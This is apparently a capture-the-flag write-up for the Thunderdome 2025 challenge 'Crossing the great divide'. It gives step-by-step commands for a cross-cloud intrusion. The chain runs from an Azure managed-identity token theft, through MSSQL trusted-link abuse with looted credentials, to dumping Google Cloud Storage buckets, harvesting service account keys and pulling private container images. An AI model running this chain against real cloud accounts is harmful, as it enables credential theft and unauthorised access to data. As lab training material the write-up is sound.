Kabinet's GitBook
Thunderdome 2025

Crossing the great divide


Solve

Within the same zip file, there's an initial-config.sql file. It contains another set of credentials, which we can add to our loot.

From our prior enumeration, we know that the virtual machine has a system-assigned managed identity. Let's try to dump its token. The identity endpoint and secret can be found in the environment variables (Get-ChildItem env:).

With the identity endpoint and secret, we can curl for an access token scoped to the management API.

curl "http://127.0.0.1:41041/msi/token/?resource=https://management.azure.com/&api-version=2017-09-01" -H "Secret: 41F02D3D5B464799867FCD3897A16785"
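The endpoint returns a JSON blob; the bearer token can be extracted with jq. A minimal sketch using a dummy response standing in for the real curl output above (the token value is a placeholder, but `access_token` is the actual field name in the MSI response):

```shell
# Dummy MSI response; in practice, capture the output of the curl above:
# RESPONSE=$(curl "http://127.0.0.1:41041/msi/token/?resource=https://management.azure.com/&api-version=2017-09-01" -H "Secret: ...")
RESPONSE='{"access_token":"eyJ0eXAiOiJKV1QifQ.sample.payload","expires_on":"1700000000","token_type":"Bearer"}'

# Extract the bearer token for use against https://management.azure.com/.
TOKEN=$(printf '%s' "$RESPONSE" | jq -r '.access_token')
echo "$TOKEN"
```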

With the access token, let's connect to Azure (Connect-AzAccount) and enumerate resources.

From the Get-AzResource output, we can see that there's a virtual machine running. Let's enumerate it further with Get-AzVM.

Next, let's get the public IP address of the virtual machine (Get-AzPublicIpAddress -ResourceGroupName SQLANALYSIS02_GROUP) and attempt to authenticate to it.

From the nmap output, we can see that port 1433 is open, running Microsoft SQL Server. Let's use Impacket's mssqlclient.py to authenticate with the credentials from initial-config.sql.

Enumerating the SQL server, I noticed that there is a trusted link. Referring to PayloadsAllTheThings' MSSQL trusted-links section, let's attempt to exploit it.

Now that we've established access to the SQL server on 34.74.254.28 via the trusted link, let's enumerate it: first confirm access with a version query through OPENQUERY, then list the tables, the columns, and finally the data itself.

SELECT * FROM OPENQUERY("34.74.254.28", 'SELECT table_name FROM bulkimport.INFORMATION_SCHEMA.TABLES WHERE table_type = ''BASE TABLE''');
SELECT COLUMN_NAME FROM OPENQUERY([34.74.254.28], 'SELECT COLUMN_NAME FROM bulkimport.INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = ''myqueries''');
SELECT * FROM OPENQUERY([34.74.254.28], 'SELECT queries FROM [bulkimport].[dbo].[myqueries]');

From the output, we can see a reference to Google Cloud Storage. GCS exposes an S3-interoperable API, so let's use s3cmd to dump the files within the buckets.

First, we configure the .s3cfg file with the following data.
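A minimal config along these lines is enough: host_base and host_bucket point s3cmd at the GCS interoperability endpoint, while the keys below are placeholders for the HMAC credentials recovered from the database.

```shell
# Write a minimal s3cmd config aimed at the GCS S3-interoperable endpoint.
# access_key/secret_key are placeholders for the recovered HMAC credentials.
cat > .s3cfg <<'EOF'
[default]
access_key = GOOG1EXAMPLEPLACEHOLDER
secret_key = EXAMPLESECRETPLACEHOLDER
host_base = storage.googleapis.com
host_bucket = storage.googleapis.com
EOF

# Quick sanity check that the endpoint is set:
grep host_base .s3cfg
```

With this in place, `s3cmd -c .s3cfg ls` lists buckets and `s3cmd -c .s3cfg get s3://<bucket>/<key>` downloads objects, exactly as against S3.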

We can then use s3cmd to interact with GCS as if it were a normal S3 bucket.

From manual enumeration, only the mp-bulk-insert and gcf-v2-sources-454107766132-us-central1 buckets contain files. Let's download and inspect the data.

Looking at bulkinsert.bcp and bulkinsert.fmt, they contain the format specification for the data to be bulk-inserted, as well as some PII.

Next, looking at the zip files: upon unzipping, both archives yield the same file.

Looking at the source code (main.py), it is probably a Google Cloud Function application, and it contains hard-coded service account credentials.

Let's copy out the service account JSON, save it as analysis.json, and authenticate with it (gcloud auth activate-service-account --key-file=analysis.json).
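For reference, a service-account key is just a JSON document. The sketch below uses placeholder values (the client_email is hypothetical); only the project ID matches the real target, as seen in the registry paths later on.

```shell
# Placeholder service-account key; only project_id matches the real target.
cat > analysis.json <<'EOF'
{
  "type": "service_account",
  "project_id": "mp-proj-1-413623",
  "client_email": "analysis@mp-proj-1-413623.iam.gserviceaccount.com",
  "private_key": "-----BEGIN PRIVATE KEY-----\n...snip...\n-----END PRIVATE KEY-----\n"
}
EOF

# Sanity-check which identity the key belongs to before authenticating:
jq -r '.client_email' analysis.json

# Then authenticate (not run here):
# gcloud auth activate-service-account --key-file=analysis.json
```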

Enumerating permissions with the Bruteforce-GCP-Permissions tool, it seems the analysis service account has a lot of permissions over Artifact Registry. Artifact Registry is a container registry similar to Docker Hub, but hosted on GCP.

Listing the repositories:

gcloud artifacts repositories list

Listing the images in the mp-default repository:

gcloud artifacts docker images list us-east1-docker.pkg.dev/mp-proj-1-413623/mp-default

Configuring Docker to authenticate against the Artifact Registry:

gcloud auth configure-docker us-east1-docker.pkg.dev

Pulling the Docker image:

docker pull us-east1-docker.pkg.dev/mp-proj-1-413623/mp-default/mp-seave@sha256:fc131d02bd19913bd3cbafc7c5d66c27af674ed99ea5a6c1522cca25075c417e

Next, we run the container to enumerate its filesystem.

docker run -it us-east1-docker.pkg.dev/mp-proj-1-413623/mp-default/mp-seave@sha256:fc131d02bd19913bd3cbafc7c5d66c27af674ed99ea5a6c1522cca25075c417e /bin/bash

Looking at the /app directory, there is another service account JSON, this one for the automation service account.

Looking at the /root directory, we are able to retrieve the flag.

TLDR

  • Retrieve a DB password from initial-config.sql

  • Get an access token for the managed identity

  • Enumerate Azure resources

  • Identify that there is a virtual machine running and retrieve its public IP address

  • Run nmap to identify open ports and services

  • Use Impacket's mssqlclient.py to authenticate with the credentials from initial-config.sql

  • Abuse the trusted link to access another database on 34.74.254.28

  • Retrieve the GCS credentials from the database on 34.74.254.28

  • Authenticate to GCS and dump the files using s3cmd

  • Authenticate to gcloud with the analysis service account JSON

  • Brute-force permissions using Bruteforce-GCP-Permissions

  • Identify that analysis has access to Artifact Registry

  • Enumerate and pull Docker images from the Artifact Registry

  • Retrieve the automation service account JSON from the /app directory

  • Get the flag from the /root directory

Reference

  • https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/MSSQL%20Injection.md#mssql-trusted-links

  • https://cloud.google.com/storage/docs/interoperability

  • https://cloud.google.com/iam/docs/service-account-overview

  • https://github.com/carlospolop/Bruteforce-GCP-Permissions

  • https://cloud.google.com/artifact-registry/docs

  • https://cloud.google.com/sdk/gcloud/reference/artifacts/docker